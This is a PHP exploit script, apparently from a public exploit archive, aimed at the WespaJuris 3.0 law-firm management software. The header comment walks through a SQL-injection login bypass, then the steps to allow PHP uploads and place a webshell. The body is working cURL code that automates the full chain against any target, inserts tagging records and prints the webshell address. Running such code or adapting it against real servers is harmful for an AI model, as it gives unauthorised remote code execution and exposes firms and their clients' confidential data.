/exploits/php/webapps/20342.php
PHP | 248 lines | 148 code | 8 blank | 92 comment | 6 complexity | ef665bfd3723a9dcd26052264d23ec54 MD5 | raw file
Possible License(s): GPL-2.0
- <?php
- /*
- # Exploit Title: WespaJuris <= 3.0 auto exploit
- # Date: 07th august 2012
- # Exploit Author: WhiteCollarGroup
- # Vendor Homepage: http://www.wespadigital.com.br/
- # Software Link: http://www.wespadigital.com.br/download/wespajuris_v3_0_2012.rar
- # Version: 3.0
- # Tested on: Apache Server
-
- WespaJuris is a software for law firms.
-
- Use this exploit to upload a webshell on vulnerable applications.
- Usage:
- php exploit.php
-
- Example
- $ php exploit.php
- WespaJuris <= 3.0 exploit
- Coded by WhiteCollarGroup
- Type Ctrl + C for exit
- Try "php exploit.php /about" for get info
-
- [?] Target address (login form):
- http://localhost/juris/
- [?] Webshell path (in your computer):
- C:\wamp\www\webshell.php
- [*] Login...
- [*] Trying to add php on allowed file formats.
- [*] Adding a new client.
- [*] Getting new client ID
- [!] Client ID: 30
- [*] Adding a new process.
- [*] Getting new process ID.
- [!] New process ID: 37
- [*] Adding new task.
- [*] Getting new task ID
- [*] New task ID: 16
- [*] Adding new doc type.
- [*] Trying to get new doc type ID.
- [!] New doc type ID: 7
- [*] Trying to upload file...
- [*] Thinking about file address...
- [!] Exploit complete.
- [i] You have now a webshell in <http://localhost/juris/clientdir/30/dl/webshell.php>
-
- Then, go to http://localhost/juris/clientdir/30/dl/webshell.php and see your webshell.
-
- :: How this exploit works? Manually work.
-
- ~> Login bypass
- On login form, enter "SQLi strings":
- Login: ' or 1=1-- wc
- Pass: wcgroup
-
- ~> Configure file formats
- Go to "CONFIGURAÇÕES".
- In "Extensões de documentos", add "php".
-
- BEGIN Do it only if the system is blank
-
- ~> Add new client
- Go to "CLIENTES E USUÁRIOS" > "adicionar".
- Add your own user.
-
- ~> Add new process
- Go to "PROCESSOS" > "adicionar".
- Add your own process.
-
- ~> Add new task
- Go to "PROCESSOS".
- Click on the process that you've created.
- In "Tarefas", click "Adicionar".
-
- ~> Add new document type
- Go to "DOCUMENTOS".
- Click "ADICIONAR/EDITAR TIPO DOCUMENTO".
- In "Adicionar Tipo de Documento" form, type anything and then, click "Adicionar".
-
- END Do it only if the system is blank
-
- ~> Get arbitrary file upload
- Go to "DOCUMENTOS".
- Click "ADICIONAR DOCUMENTO".
- In "Título", select a client and a process. Click "PROSSEGUIR".
- Select a task in "TAREFAS", a document type in "Escolha um Tipo".
- In "Título do documento", type anything.
- Upload file in "Subir arquivo do Documento". Leaves "Link para Documento na Internet" empty.
- Click "Adicionar Novo Documento".
- Click "DOCUMENTOS" and click on the your webshell.
-
- */
- set_time_limit(0);
- echo "WespaJuris <= 3.0 auto exploit\n";
- echo "Coded by WhiteCollarGroup\n";
- echo "Type Ctrl + C for exit\n";
-
- if((isset($argv[1])) AND ($argv[1]=="/about")) {
- echo "WhiteCollarGroup\nwww.wcgroup.host56.com\nwhitecollar_group@hotmail.com\nTwitter/Facebook/Blogspot: WCollarGroup\nirc.virtualife.com.br #wcgroup\n\n";
- exit;
- } else {
- echo "Try \"php $argv[0] /about\" for get info\n";
- }
- echo "\n";
- if(!function_exists("curl_init")) {
- echo "PHP CURL was not found on this system.\n";
- echo "Linux (Debian-like apt system): Type the following command on shell:\n";
- echo "# apt-get install php5-curl\n\n";
- echo "Unix: Edit your file php.ini and remove \";\" from following line:\n";
- echo ";extension=curl.so\n\n";
- echo "Windows: Edit your file php.ini and remove \";\" from following line:\n";
- echo ";extension=php_curl.dll\n\n";
- echo "Read more: http://www.php.net/manual/book.curl.php\n\n";
- exit;
- }
-
- puts("Target address (login form):", "[?]");
- $target = trim(fgets(STDIN));
-
- $target = preg_replace("/index\.php$/", null, $target);
- $target = preg_replace("/\/$/", null, $target);
-
- puts("Webshell path (in your computer):", "[?]");
-
- do {
- $webshell = trim(fgets(STDIN));
- if(!file_exists($webshell)) echo "File not found!";
- } while(!file_exists($webshell));
-
- $ch = curl_init();
-
-
- // login
- puts("Login...");
- curl_setopt($ch, CURLOPT_URL, $target."/process_login.php");
- curl_setopt($ch, CURLOPT_REFERER, $target);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "do=login&username=".urlencode("' or 1=1-- wc")."&password=wcgroup");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "wcgroup.txt");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $store = curl_exec($ch);
- if(preg_match("/Dados de acesso incorretos, por favor tente novamente/", $store)) {
- puts("Could not login.", "[-]");
- echo "Make sure that the server uses a vulnerable version of WespaJuris.\n";
- exit;
- }
-
- // config file format
- $ext = end(explode(".", $webshell));
- puts("Trying to add $ext on allowed file formats.");
- curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=settings");
- curl_setopt($ch, CURLOPT_POSTFIELDS, "task=defsideset&new_serverdiff=0&new_dateformat=".urlencode("%Y/%c/%e")."&new_extensions=".urlencode("$ext,php,jpg,jpeg,gif,png,psd,zip,ai,pdf,doc"));
- curl_exec($ch);
-
- // add client
- puts("Adding a new client.");
- curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addclient");
- curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addclient&company=WhiteCollarGroup&address1=www.wcgroup.host56.com&address2=whitecollar_group%40hotmail.com&city=%40WCollarGroup&state=facebook.com%2FWCollarGroup&zip=wcollargroup.blogspot.com&country=irc.virtualife.com.br+%23wcgroup&phone=WCGroup&phone_alt=This+was+a+auto+exploit&fax=We+did+not+hack+your+website");
- curl_exec($ch);
-
- // get user ID
- puts("Getting new client ID");
- curl_setopt($ch, CURLOPT_POST, 0);
- curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addfiles");
- $store = curl_exec($ch);
- $numbers = array();
- preg_match_all("/<option value=\"main\.php\?pg=addfiles&clid=(.*)\">WhiteCollarGroup<\/option>/", $store, $numbers);
- $uid = $numbers[1][0];
- puts("Client ID: $uid", "[!]");
-
- // add process
- puts("Adding a new process.");
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addproj");
- curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addproject&client_id=".$uid."&project_title=HackMySite&description=WCGroup+did+not+hacked+your+website.%0D%0AWCGroup+only+wrote+the+exploit+for+this+CMS+and+did+public+release.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&cost=0.00&status=Arquivado");
- $store = curl_exec($ch);
-
- // get process ID
- puts("Getting new process ID.");
- $numbers = array();
- preg_match_all("/main\.php\?pg=projperms&pid=([0-9]*)/", $store, $numbers);
- $pid = $numbers[1][0];
- puts("New process ID: $pid", "[!]");
-
- // add task
- puts("Adding new task.");
- curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addtask");
- curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addtask&clid=$uid&pid=$pid&client_id=main.php%3Fpg%3Daddtask%26clid%3D$uid&pid=$pid&task_title=Hacked+site&description=Sorry%2C+admin.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&status=Em+andamento¬es=Check+www.wcgroup.host56.com+for+details&tuid=0");
- $store = curl_exec($ch);
-
- // get task id
- puts("Getting new task ID");
- curl_setopt($ch, CURLOPT_POST, 0);
- curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=proj&clid=$uid&pid=$pid");
- $store = curl_exec($ch);
- $numbers = array();
- preg_match_all("/main\.php\?pg=edittask&clid=$uid&pid=$pid&tid=([0-9]*)/", $store, $numbers);
- $taskid = $numbers[1][0];
- puts("New task ID: $taskid");
-
- // add doc type
- puts("Adding new doc type.");
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=filetypes");
- curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addfiletype&file_type=hack");
- curl_exec($ch);
-
- // get doc type id
- puts("Trying to get new doc type ID.");
- curl_setopt($ch, CURLOPT_POST, 0);
- curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=filetypes");
- $store = curl_exec($ch);
- $numbers = array();
- preg_match_all("/main\.php\?pg=filetypes&task=deltype&type_id=([0-9]*)/", $store, $numbers);
- $tid = $numbers[1][0];
- puts("New doc type ID: $tid", "[!]");
-
- // upload file
- puts("Trying to upload file...");
- curl_setopt($ch, CURLOPT_POST, 1);
- $post = array(
- "task" => "addfile",
- "client_id" => $uid,
- "from" => "step1",
- "project_id" => $pid,
- "clid" => $uid,
- "task_id" => $taskid,
- "type_id" => $tid,
- "file_title" => "wcgroup",
- "file" => "@$webshell"
- );
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- curl_exec($ch);
-
- // make file address
- puts("Thinking about file address...");
- $fileaddr = $target."/clientdir/$uid/dl/".basename($webshell);
-
- puts("Exploit complete.", "[!]");
- puts("You have now a webshell in <$fileaddr>", "[i]");
-
- function puts($str, $type=false) {
- if(!$type) $type = "[*]";
- echo $type." ".$str."\n";
- }